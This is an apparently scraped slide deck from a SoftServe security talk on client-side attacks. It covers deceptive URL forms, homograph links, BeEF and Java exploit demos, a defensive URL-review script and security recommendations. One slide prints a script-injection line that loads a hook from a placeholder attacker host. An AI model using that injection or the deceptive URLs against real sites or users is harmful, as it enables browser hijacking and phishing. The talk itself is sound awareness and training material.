Welcome to the world of hacking
![Page 1: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/1.jpg)
Welcome to the world of HACKING
by Nazar Tymoshyk, R&D team, SoftServe
& Bohdan Serednyskyj, R&D team, SoftServe
![Page 2: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/2.jpg)
What is this topic about?
![Page 3: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/3.jpg)
How my friends see it / What my mom thinks / How society perceives it
How the authorities see it / How I imagine it myself / And what it really is
![Page 4: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/4.jpg)
This is more of an educational topic, not a motivational one
![Page 5: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/5.jpg)
Amateurs hack systems, professionals hack PEOPLE
Client Side Attacks
![Page 6: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/6.jpg)
![Page 7: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/7.jpg)
About me
![Page 8: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/8.jpg)
Feel free to ask me anything :)
![Page 9: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/9.jpg)
Best SoftServe Team – R&D
![Page 10: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/10.jpg)
Security Team
Nazar Tymoshyk
CEH, HP FSTS, CIW WSS, Cisco SS, ZSS, CLE, DCTS, DCATS, NAI, CLP, NLTS, CNA, NCLA, MCTS
Bohdan Serednytskyi
CEH, MSTC Security, ZSS
![Page 11: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/11.jpg)
Certifications
Ph.D in Security
Identity & Security
SoftServe experts are certified in HP Fortify Security Testing solution
![Page 12: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/12.jpg)
Time for fun. Just relax
![Page 13: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/13.jpg)
Target – web users
![Page 14: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/14.jpg)
Everybody knows that the government is spying on us
![Page 15: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/15.jpg)
Every day we are getting suspicious emails
![Page 16: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/16.jpg)
And online promotions
Yes!!! Just click the link below
![Page 17: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/17.jpg)
Quick Quiz
1. Will this URL work in IE?
   http:\\example.com\
2. What page will be opened in Firefox browser after entering this URL?
   http://example.com\@coredump.cx/

Answers
1. Yes. IE and most browsers parse “\” as “/” for usability reasons.
2. In Firefox, that URL will take the user to coredump.cx, because example.com\ will be interpreted as a valid value for the login field. In almost all other browsers, “\” will be interpreted as a path delimiter, and the user will land on example.com instead.
![Page 18: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/18.jpg)
Now try it yourself: what do you get?!
![Page 19: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/19.jpg)
Tricky URLs
For all browsers http://example.com&gibberish=1234@167772161/
And http://example.com\@coredump.cx/ is http://example.com/ for all…
![Page 20: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/20.jpg)
This is it!
For all browsers http://example.com&gibberish=1234@167772161/ is http://10.0.0.1/
And http://example.com\@coredump.cx/ is http://example.com/ for all…
…but for Firefox it’s http://coredump.cx/
![Page 21: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/21.jpg)
Cheaters
http://example.com/.wholesome-domain.com/
This only looks like a real slash.
Read: Evgeniy Gabrilovich and Alex Gontmakher, “The Homograph Attack”
![Page 22: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/22.jpg)
Server addresses
• http://127.0.0.1/ This is a canonical representation of an IPv4 address.
• http://0x7f.1/ This is a representation of the same address that uses a hexadecimal number to represent the first octet and concatenates all the remaining octets into a single decimal value.
• http://017700000001/ The same address is denoted using a 0-prefixed octal value, with all octets concatenated into a single 32-bit integer.
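Added example, not part of the original slides: a link-review check for the "Tricky URLs" and "Server addresses" slides. It reports every host a link can resolve to under the two backslash rules described in the quiz, flags a hidden login field, and rewrites hexadecimal, octal and single-integer IPv4 hosts to dotted-quad form. The function names are assumptions made for this sketch.

```python
import re

def parse_part(part):
    """One dotted component, read the way inet_aton-style parsers read it."""
    if re.fullmatch(r"0[xX][0-9a-fA-F]+", part):
        return int(part, 16)          # 0x7f -> 127
    if re.fullmatch(r"0[0-7]+", part):
        return int(part, 8)           # 017700000001 -> 2130706433
    if re.fullmatch(r"0|[1-9][0-9]*", part):
        return int(part, 10)
    return None

def canonical_ipv4(host):
    """Dotted-quad form of a legacy numeric IPv4 host, or None for a name."""
    parts = host.split(".")
    nums = [parse_part(p) for p in parts]
    if len(parts) > 4 or None in nums:
        return None
    *head, last = nums
    # Leading parts are single octets; the last part fills the remaining bytes.
    if any(n > 255 for n in head) or last >= 256 ** (4 - len(head)):
        return None
    value = last + sum(n << (8 * (3 - i)) for i, n in enumerate(head))
    return ".".join(str((value >> s) & 255) for s in (24, 16, 8, 0))

def host_of(url, backslash_is_slash):
    """Host of a scheme://... URL under one of two authority-parsing rules."""
    rest = url.partition("://")[2]
    stops = "/?#\\" if backslash_is_slash else "/?#"
    end = min((rest.find(c) for c in stops if c in rest), default=len(rest))
    userinfo, at, hostport = rest[:end].rpartition("@")
    host = hostport.split(":", 1)[0].lower()   # IPv6 literals are out of scope
    return canonical_ipv4(host) or host, bool(at)

def review(url):
    """Report every host a link may resolve to and whether it hides userinfo."""
    strict_host, strict_user = host_of(url, backslash_is_slash=False)
    lenient_host, lenient_user = host_of(url, backslash_is_slash=True)
    return {
        "hosts": sorted({strict_host, lenient_host}),
        "userinfo": strict_user or lenient_user,
        "parser_dependent": strict_host != lenient_host,
    }

if __name__ == "__main__":
    # URLs quoted on the slides
    for u in ("http://example.com&gibberish=1234@167772161/",
              "http://example.com\\@coredump.cx/", "http://0x7f.1/"):
        print(u, review(u))
```

A mail or proxy filter can treat `userinfo` or `parser_dependent` being true as grounds to quarantine a link, and should apply its allow and deny lists to the normalised `hosts` rather than to the raw string.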
![Page 23: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/23.jpg)
Now attention
![Page 24: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/24.jpg)
Recommended Book
![Page 25: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/25.jpg)
DEMO I
![Page 26: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/26.jpg)
BeEF – Browser Exploitation Framework
![Page 27: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/27.jpg)
Our victim site <script src=http://attackersite/hook.js></script>
http://192.168.241.240:8882
![Page 28: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/28.jpg)
Now about Java
![Page 29: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/29.jpg)
Everybody likes Java
![Page 30: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/30.jpg)
But there is a small problem in 2013
![Page 31: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/31.jpg)
![Page 32: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/32.jpg)
Java exploits in Metasploit 4
Status - Excellent
![Page 33: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/33.jpg)
JVM vulnerabilities
![Page 34: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/34.jpg)
DEMO II
![Page 35: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/35.jpg)
Social Engineering Toolkit
![Page 36: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/36.jpg)
Consequences
• Stolen developer cloud access certificates
• Malware and spyware on PC and mobile
• Key loggers
• Money lost – PayPal, WebMoney, etc.
• Email – account recovery and stolen accounts
• SHAME!
![Page 37: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/37.jpg)
Recommendations
• Keep Java and all other software up to date
• Antivirus – Kasper rocks!
• Encrypted keys to infrastructure
• 2-factor authentication everywhere (email first)
• Verify yourself and your browser on …
• Attention
![Page 38: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/38.jpg)
OWASP Secure Coding Guide
![Page 39: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/39.jpg)
Apache Shiro
![Page 40: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/40.jpg)
OWASP WebGoat, DVWA - Train yourself in Security
![Page 41: Welcome to the world of hacking](https://reader034.fdocuments.net/reader034/viewer/2022052522/54c265e84a795967748b45e5/html5/thumbnails/41.jpg)
Hope you like it!